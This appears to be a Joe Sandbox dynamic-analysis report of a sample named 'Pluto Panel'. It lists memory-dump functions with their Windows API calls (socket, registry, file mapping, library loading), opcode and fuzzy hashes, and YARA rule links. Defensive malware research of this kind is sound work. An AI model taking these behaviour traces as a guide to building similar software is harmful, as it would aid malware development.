                                                                                                          • API String ID: 3793708945-0
                                                                                                          • Opcode ID: 5e27477ac292387177b8f7f520212001b71df7399c1878454fa535511a62ed47
                                                                                                          • Instruction ID: b5cb5a2db98b5c600343355cde838811b04a35dcd9d2b8d8becf7327d8f5e04b
                                                                                                          • Opcode Fuzzy Hash: 5e27477ac292387177b8f7f520212001b71df7399c1878454fa535511a62ed47
                                                                                                          • Instruction Fuzzy Hash: CB118471409380AFDB228F55DC44A62FFF4EF4A220F0885DAED858F253C375A418DB61
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03230032 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ReadFile.KERNELBASE(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 03230091
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 2738559852-0
                                                                                                          • Opcode ID: 3baebd17363048e57be2fdd52d3f2536613e914f1d5fe8357f10d767e48ff565
                                                                                                          • Instruction ID: a60f62cf289dd2229fec68f00adbbfbfdca3ec9196b9e0f2c306d5c75bc62d1e
                                                                                                          • Opcode Fuzzy Hash: 3baebd17363048e57be2fdd52d3f2536613e914f1d5fe8357f10d767e48ff565
                                                                                                          • Instruction Fuzzy Hash: E011C472504201AFEB21CF51DC44F9AFBA8EF04320F08C46AED459F251C279A548CFB1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 032301AA Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateActCtxA.KERNEL32(?,00000E2C,?,?), ref: 03230226
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Create
                                                                                                          • String ID:
                                                                                                          • API String ID: 2289755597-0
                                                                                                          • Opcode ID: 44a54f043744a56b1af2d775f0dfdb8d3e0e1d7aecee5553e34262422a6a9da6
                                                                                                          • Instruction ID: 940ab0ecdd70c407cf8de9bf79de98b9993a773cb9de45bf7544722dcfd550f3
                                                                                                          • Opcode Fuzzy Hash: 44a54f043744a56b1af2d775f0dfdb8d3e0e1d7aecee5553e34262422a6a9da6
                                                                                                          • Instruction Fuzzy Hash: BB11E671509380AFC3118B26CC45F26FFB4EF86620F09819AED484B282D225F804CBA2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03231066 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ioctlsocket.WS2_32(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 032310BF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ioctlsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 3577187118-0
                                                                                                          • Opcode ID: 79c240e09c91e663632627e4f366ff17a52943b4abbbf7e397d1a9b0cf995af7
                                                                                                          • Instruction ID: ba4c6f3541ab321a298b02f73b7c830f0bb9775b9a1a756cf837142d03b31cd6
                                                                                                          • Opcode Fuzzy Hash: 79c240e09c91e663632627e4f366ff17a52943b4abbbf7e397d1a9b0cf995af7
                                                                                                          • Instruction Fuzzy Hash: 4011E3B1504241AFEB10DF55DC85BAAFBACEF05320F08C4AAED459F251C278A5488FB1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167A2D6 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0167A32C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ChangeCloseFindNotification
                                                                                                          • String ID:
                                                                                                          • API String ID: 2591292051-0
                                                                                                          • Opcode ID: 2b7b8de31d29db011f3154d9df5b3b176278598dee9c48cf0e8a49aa00a2f76f
                                                                                                          • Instruction ID: dbc1be69bec7db33ee3af5c600c48eb88ef393d27d69846c1febbb9196c555de
                                                                                                          • Opcode Fuzzy Hash: 2b7b8de31d29db011f3154d9df5b3b176278598dee9c48cf0e8a49aa00a2f76f
                                                                                                          • Instruction Fuzzy Hash: CB11A7715093C0AFDB128F25DC55756BFB8EF06220F0884EBED858F653D2749808CB62
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 032314A4 Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 03231504
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileView
                                                                                                          • String ID:
                                                                                                          • API String ID: 3314676101-0
                                                                                                          • Opcode ID: 0d54cff28b243de52e579693314431f8fa2414348c9148800370791a84d39ab0
                                                                                                          • Instruction ID: a5c6231129421d1e99d3127609aaadf0c31c621640e3df096ebfdc288049a92f
                                                                                                          • Opcode Fuzzy Hash: 0d54cff28b243de52e579693314431f8fa2414348c9148800370791a84d39ab0
                                                                                                          • Instruction Fuzzy Hash: 0A119071409380AFDB21CF55DC44B56FFB4EF06220F09899EED858F262C375A418DB61
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167A87F Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: closesocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 2781271927-0
                                                                                                          • Opcode ID: 4bfb20299c1a0171083b6a83a743c289c17df276ab3b55c022ddb5504eb9944c
                                                                                                          • Instruction ID: e57c88e682d536476d6e78e8481d0447dbc2c7a94569ad2e717b149845752e5c
                                                                                                          • Opcode Fuzzy Hash: 4bfb20299c1a0171083b6a83a743c289c17df276ab3b55c022ddb5504eb9944c
                                                                                                          • Instruction Fuzzy Hash: DC11BF71449384AFDB128F15DC45B56BFB4EF06220F1884DAED858F253D279A808CB62
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167BD42 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetFileType.KERNELBASE(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 0167BD95
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileType
                                                                                                          • String ID:
                                                                                                          • API String ID: 3081899298-0
                                                                                                          • Opcode ID: 1b13cd159e54a67c65476009535900714afd3f2d06ca8215fab56dd8911dd52d
                                                                                                          • Instruction ID: c390c2a9429043d721ab67183dc80f6199dd477174027df1dbad30cfebea0049
                                                                                                          • Opcode Fuzzy Hash: 1b13cd159e54a67c65476009535900714afd3f2d06ca8215fab56dd8911dd52d
                                                                                                          • Instruction Fuzzy Hash: AA01F576504200AFE711CF55DC85BAAFBA8EF04720F18C4AAED45AF251D27CA508CEB2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0323141E Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000E2C,?,?), ref: 0323146E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFileMapping
                                                                                                          • String ID:
                                                                                                          • API String ID: 524692379-0
                                                                                                          • Opcode ID: 1765ed42a672776a93e5e2b852011ff1cc4388866df7099a992a3615b4d8b8e3
                                                                                                          • Instruction ID: a72d1d3e4e74c518f8c6d1454d9ed7a0ee0db72e7b47a76beafeb317b18faf8b
                                                                                                          • Opcode Fuzzy Hash: 1765ed42a672776a93e5e2b852011ff1cc4388866df7099a992a3615b4d8b8e3
                                                                                                          • Instruction Fuzzy Hash: C201B172901600ABD710DF16DC86B26FBA8FB88A20F14812AED088B641E275F515CBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167A172 Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WSAStartup.WS2_32(?,00000E2C,?,?), ref: 0167A1C2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Startup
                                                                                                          • String ID:
                                                                                                          • API String ID: 724789610-0
                                                                                                          • Opcode ID: 85ea9b17d531ba548d72d5954391662748219892a84cd453da4301b5c6f3190f
                                                                                                          • Instruction ID: c42ada3df638965e1bec20b5469ddeba045aa3765d802ded8d6e0c08cdcf4434
                                                                                                          • Opcode Fuzzy Hash: 85ea9b17d531ba548d72d5954391662748219892a84cd453da4301b5c6f3190f
                                                                                                          • Instruction Fuzzy Hash: 1101D471901600ABD710DF16DC86B26FBB8FF88A20F14816AED088B741E275F515CBE1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03231A9E Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 03231AE9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LibraryLoadShim
                                                                                                          • String ID:
                                                                                                          • API String ID: 1475914169-0
                                                                                                          • Opcode ID: 0d22260b680feb962d885d4e174ee7cf1af9eee4bde1a5137454f10ced3b65a9
                                                                                                          • Instruction ID: 7119a81e208e5785d11e86dd72ab0384a30030f64448fa15063daa28fc769884
                                                                                                          • Opcode Fuzzy Hash: 0d22260b680feb962d885d4e174ee7cf1af9eee4bde1a5137454f10ced3b65a9
                                                                                                          • Instruction Fuzzy Hash: 070180B26102019FDB20DE15D884B16FBE8EF05621F08809ADD458B315D275F458CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167A5D6 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0167A61A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DuplicateHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3793708945-0
                                                                                                          • Opcode ID: f2565b6d1888960af172a0f004b968ef3f1dbc3f89f775c701a17620e2d509a6
                                                                                                          • Instruction ID: 1e441d531840f6aef785f88e3e486122b4b879e18ab238d9ae2b17389fce51aa
                                                                                                          • Opcode Fuzzy Hash: f2565b6d1888960af172a0f004b968ef3f1dbc3f89f775c701a17620e2d509a6
                                                                                                          • Instruction Fuzzy Hash: 6D016D72404600DFDB218F95DC44B5AFFE4EF48620F08C5AAEE894B616D375E019DF62
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 032301D6 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateActCtxA.KERNEL32(?,00000E2C,?,?), ref: 03230226
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Create
                                                                                                          • String ID:
                                                                                                          • API String ID: 2289755597-0
                                                                                                          • Opcode ID: d1c5f5b23e1a66c53ab3b8f27a5a14fc36eddad22feb28cbed48be5e06a87015
                                                                                                          • Instruction ID: 46049f89a3972b7d09af81a4ecff5b0cc83f1b6d75e42c9fd086adc4c3a9382c
                                                                                                          • Opcode Fuzzy Hash: d1c5f5b23e1a66c53ab3b8f27a5a14fc36eddad22feb28cbed48be5e06a87015
                                                                                                          • Instruction Fuzzy Hash: F801A271500601ABD710DF16DC86B26FBA8FB88A20F14815AED084B741E275F515CBE5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 032314C6 Relevance: 1.5, APIs: 1, Instructions: 43fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 03231504
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileView
                                                                                                          • String ID:
                                                                                                          • API String ID: 3314676101-0
                                                                                                          • Opcode ID: 09a5a243a4d17f8d449d8c9dbf5d408ff4ab4c17f36a1a6515f133acced40cbe
                                                                                                          • Instruction ID: 0a80fa79ff7ef14075809f3148fabe23c0081aa6510956775113188b5719539d
                                                                                                          • Opcode Fuzzy Hash: 09a5a243a4d17f8d449d8c9dbf5d408ff4ab4c17f36a1a6515f133acced40cbe
                                                                                                          • Instruction Fuzzy Hash: 13018C725152409FDB20DF55E844B56FFE4EF04220F08C8AADE464B616D275E068DF62
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167A2FA Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0167A32C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ChangeCloseFindNotification
                                                                                                          • String ID:
                                                                                                          • API String ID: 2591292051-0
                                                                                                          • Opcode ID: dcb4ded9312daa1028ab5a364e2f62147813489e393364296c4297ec1187b97a
                                                                                                          • Instruction ID: cd8c1f66144f3726fe3f1eb8af980659b7821d8ce0d00cb99eec235fcc64ff77
                                                                                                          • Opcode Fuzzy Hash: dcb4ded9312daa1028ab5a364e2f62147813489e393364296c4297ec1187b97a
                                                                                                          • Instruction Fuzzy Hash: 380171719042418FDB108F69EC8576AFBA4EF04631F08C4AADD49CF356D2799408CE62
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167B7B2 Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 0167B802
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 3660427363-0
                                                                                                          • Opcode ID: 396fcdcc2311eed5976a923e9639d4adc8f290eda2ecc119d495c01c14925c7c
                                                                                                          • Instruction ID: 8a17e7045c233db539a4bed82dfa1319051bb95be42af212efa8bd12c11a3de4
                                                                                                          • Opcode Fuzzy Hash: 396fcdcc2311eed5976a923e9639d4adc8f290eda2ecc119d495c01c14925c7c
                                                                                                          • Instruction Fuzzy Hash: 9C01A272500601ABD310DF16DC86B26FBA8FB88A20F14C11AED084B741E375F515CBE5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167A8AE Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: closesocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 2781271927-0
                                                                                                          • Opcode ID: 13045918fb783b85a3f15834ed29cbb4edd7cb9aa408009559f4b7a80b097ad7
                                                                                                          • Instruction ID: c2532e9cd593687de0e7b3f947f598b8e8166b1891786d1186469fcc00aded88
                                                                                                          • Opcode Fuzzy Hash: 13045918fb783b85a3f15834ed29cbb4edd7cb9aa408009559f4b7a80b097ad7
                                                                                                          • Instruction Fuzzy Hash: 1501AD759042418FDB10CF59EC8476AFFA4EF04220F18C4AADD498F316D379A509CFA2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167A69A Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNELBASE(?), ref: 0167A6CC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode
                                                                                                          • String ID:
                                                                                                          • API String ID: 2340568224-0
                                                                                                          • Opcode ID: c0de736815bef454520b5d04c9164b33a34ac4fab2b80f7a3cb922d70af8394e
                                                                                                          • Instruction ID: 32c23939944d8dcd626769df569cdc9a451a6f28e4da4f705d68c7f1acc4a22a
                                                                                                          • Opcode Fuzzy Hash: c0de736815bef454520b5d04c9164b33a34ac4fab2b80f7a3cb922d70af8394e
                                                                                                          • Instruction Fuzzy Hash: 5AF0A9359042419FDB208F59EC8876AFFA0EF44221F18C1AADD494F326D379A449DEA2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0320088A Relevance: 1.4, Strings: 1, Instructions: 178COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: :@!q
                                                                                                          • API String ID: 0-1708465744
                                                                                                          • Opcode ID: b88dd5247d39d34cbea71d78833bd70367fc7da2b584ae47b5e7be47fb9eb0b2
                                                                                                          • Instruction ID: af4080b87dd5625f39e0bb63eff0d378bbfcda0ddaa029f12fdc2332f194eb8f
                                                                                                          • Opcode Fuzzy Hash: b88dd5247d39d34cbea71d78833bd70367fc7da2b584ae47b5e7be47fb9eb0b2
                                                                                                          • Instruction Fuzzy Hash: 6A71F570E11219CFEB14DFA5C894BADBBB2BF48310F1481A9D509BB3A1DB759989CF10
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03200CD0 Relevance: .3, Instructions: 320COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 206cf12b5967c7f06dabf16205ed432fe52edd0bf67d318451af0455d93b6f29
                                                                                                          • Instruction ID: 1a93492f0e25995aebbd6128a72e521782f1a38c0ba842f52b0bccc276edf56a
                                                                                                          • Opcode Fuzzy Hash: 206cf12b5967c7f06dabf16205ed432fe52edd0bf67d318451af0455d93b6f29
                                                                                                          • Instruction Fuzzy Hash: A5F1A734A0120AEFCB04DFA4D4949DEB7B2FF85308F2545A8D4056B369EB766E4ACF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03200D20 Relevance: .3, Instructions: 307COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8d1019229c0a6091265006fa4417e07a1c3ec9390d0cbfc92c1647dbdaeea445
                                                                                                          • Instruction ID: d2ee657d0b01f3aba97eadf70baab73d2dc4fee759c593c2e07badf819d3b62d
                                                                                                          • Opcode Fuzzy Hash: 8d1019229c0a6091265006fa4417e07a1c3ec9390d0cbfc92c1647dbdaeea445
                                                                                                          • Instruction Fuzzy Hash: 9DE1A634A0120AEFCB04DFA4D4949DEB7B2FF85308F2545A8D4056B369EB766E4ACF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03200D30 Relevance: .3, Instructions: 298COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 466a4db2cb135d54c61459d05acdef8c804b312d44e1650e0fb9e65cf47f12d9
                                                                                                          • Instruction ID: 429b4611924048caf7d328e806b521e40ace47a5388353e3f72fc5d942012a31
                                                                                                          • Opcode Fuzzy Hash: 466a4db2cb135d54c61459d05acdef8c804b312d44e1650e0fb9e65cf47f12d9
                                                                                                          • Instruction Fuzzy Hash: 10E19634A0120AEFCB04DF55D4949DEB7B2FF84308F2545A8D4056B369EB766E4ACF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03201C50 Relevance: .1, Instructions: 117COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cb200445694dd31d52df8fa5d98eadda500e9960530e7826ce6693fe2c6010ff
                                                                                                          • Instruction ID: 3b769e94a422e83547c2f819b6deee82f8d05241e7eeaccb9ee7e43b123cf15d
                                                                                                          • Opcode Fuzzy Hash: cb200445694dd31d52df8fa5d98eadda500e9960530e7826ce6693fe2c6010ff
                                                                                                          • Instruction Fuzzy Hash: 73413631A02208CFDB19DBB4C8509EEBBB2FF8A315F519469D401772A1DB36A846CB15
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 032002D0 Relevance: .1, Instructions: 117COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e2cc2f62f5019ba77ced0ec570867d1d215ec7dd9d15c95e07553dc52dcb9751
                                                                                                          • Instruction ID: e20b2dc0a8ac9d370e599365b450dda8a24caead2dab754cf3c4867c44571840
                                                                                                          • Opcode Fuzzy Hash: e2cc2f62f5019ba77ced0ec570867d1d215ec7dd9d15c95e07553dc52dcb9751
                                                                                                          • Instruction Fuzzy Hash: 94419FB8A10209DFEB01DFA8C884B9DBBF1FB0D310F145495E502BB3A1D675A984DF65
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 032002C0 Relevance: .1, Instructions: 116COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 63797a9da18885f6c3e260821f543877b326dc1d4c066a30a6d00f75670cc9cf
                                                                                                          • Instruction ID: c49baa27f33f883f9d4612618840a716cd4b6a9ac482ff7c630d9f2f6cd3d9df
                                                                                                          • Opcode Fuzzy Hash: 63797a9da18885f6c3e260821f543877b326dc1d4c066a30a6d00f75670cc9cf
                                                                                                          • Instruction Fuzzy Hash: 0941DFB8A10209DFEB01DFA8C884B9DBBF1FB0D310F145495E602BB3A1D675A984DF25
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03201C60 Relevance: .1, Instructions: 107COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705481925.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3200000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3d83b3c51e27c138f6ff89b6c8700d44b1d9dc0578d63001327a3c3ecf5bcd1c
                                                                                                          • Instruction ID: fe527410bc1fd5094476f5a6276c88bffd35da4e806a9d6ed690d686f0b1c0ae
